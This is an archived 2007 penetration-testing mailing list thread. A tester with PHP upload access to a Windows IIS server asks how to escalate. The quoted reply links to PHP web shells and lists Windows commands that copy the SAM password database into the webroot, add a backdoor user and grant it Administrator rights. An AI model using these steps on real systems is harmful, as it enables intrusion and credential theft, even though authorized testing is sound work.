Re: PHP Exploitation

From: Danux (danuxx@gmail.com)
Date: Mon Nov 26 2007 - 18:38:08 EST


First of all, thanks all for your excellent help, and answering
DokFLeed.. yes, it is a authorized client to whom i am testing his PHP
APP.

But unfortunately the PHP APP dont have Zend Optimizer installed and
the other one (r57shell) is for Unix-like OS and i need a Windows
shell.

Finally and the most important thing, remember i dont have privilege
to run system commands because of IUSR_MACHINE user privileges
(Windows IIS-6 PHP-5), so i cant execute PHP Commands like system,
proc_open, passthru, exec, etc, so even though r57shell would have
being used, its based of aforementioned commands so it also would have
failed.

By now, i am able to connect to my machine through PHP Socket from PHP
APP Host (Client), but i think i need to bypass cmd.exe execution
(privilege scalation, etc) in order to really own the machine or to
assure there is no way to break into the client machine through its
PHP APP.

Thanks in Advance.

On Nov 25, 2007 7:12 AM, DokFLeed <dokfleed@dokfleed.net> wrote:
> I assume its for the good cause, and you are authorized to do so ?!
>
> Upload this to the server
> http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
> encoded for Zend Optimizer
> Or
> http://no.spam.ee/~tonu/phpshell/r57shell.txt
>
> Try the following commands:
> =====================
> 1) To see whats running on system
> tasklist -SVC
> 2) To get a copy of the sam database
> copy C:\windows\repair\sam C:\www\sam.txt
> http://hostname/sam.txt
> 3) To add new user with username tested123 & password tested123
> net user tested123 tested123 /add /active:yes /expires:never
> /passwordchg:yes /passwordreq:yes
> 4) To make him Administrator
> net localgroup Administrators tested123 /add
> 5) Try to RDP to the server , if it is Firewalled!!
> Download the RDP web front "Remote Desktop Connection Web Connection
> Software (455 KB)"
> Start IIS http://hostname /TSweb/
> and log to Localhost
>
> remember while testing, your imagination is your limitation:),
> depending on your phpinfo output none of this might work, so you will have
> to code around it
>
> Dok
> Smoke Dope, Eat Soap, Fly Home in a Bubble
>
> ==================
>
> ----- Original Message -----
> From: "Danux" <danuxx@gmail.com>
> To: <pen-test@securityfocus.com>
> Sent: Friday, November 23, 2007 6:29 AM
> Subject: PHP Exploitation
>
>
> > Hi experts, i need your ideas,
> >
> > By now, i am able to upload php files to a Windows 2003 Server, so i
> > can execute php code like phpinfo, but i cant execute passthru command
> > because of lack of IUSR_MACHINE privileges.
> > I have run some local php bof's without success.
> >
> > Do you have another idea to break into the server through php code
> > uploaded?
> >
> > Cheers!!!!!
> >
> > --
> > Danux, CISSP
> > Chief Information Security Officer
> > Macula Security Consulting Group
> > www.macula-group.com
> >
> > ------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Need to secure your web apps NOW?
> > Cenzic finds more, "real" vulnerabilities fast.
> > Click to try it, buy it or download a solution FREE today!
> >
> > http://www.cenzic.com/downloads
> > ------------------------------------------------------------------------
> >
>
>

-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:13 EDT